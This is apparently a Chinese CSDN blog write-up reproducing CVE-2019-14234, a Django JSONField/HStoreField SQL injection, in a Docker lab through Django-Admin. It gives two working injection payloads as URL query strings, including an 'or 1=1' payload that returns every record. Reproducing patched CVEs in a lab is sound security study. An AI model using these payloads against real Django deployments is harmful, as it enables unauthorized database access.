Django JSONField/HStoreField SQL注入漏洞(CVE-2019-14234)

本文报道了Django在2019年发布的安全更新,修复了JSONField和HStoreField的SQL注入漏洞。通过搭建Docker环境并利用Django-Admin重现漏洞,展示了如何构造SQL注入payload进行攻击。
摘要由CSDN通过智能技术生成

漏洞描述

Django 于2019年8月1日 日发布了安全更新,修复了 JSONField 和 HStoreField 两个模型字段的 SQL 注入漏洞。

参考链接:

该漏洞要求开发者使用 JSONField/HStoreField;此外,还可以控制 QuerySet 的字段名称。Django 的内置应用程序 Django-Admin 受到影响,这为我们提供了一种重现漏洞的简单方法。

漏洞环境及利用

搭建docker环境

首先,使用用户名和密码登录 Django-Admin,admin,a123123123http://your-ip:8000/admin/

然后转到模型的列表视图:http://your-ip:8000/admin/vuln/collection/Collection

 构建sql注入payload

?detail__a%27b=123 

可以看到成功注入

 

or 1=1返回所有结果

?detail__title%27)%3d%271%27 or 1%3d1%2d%2d%20

 

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值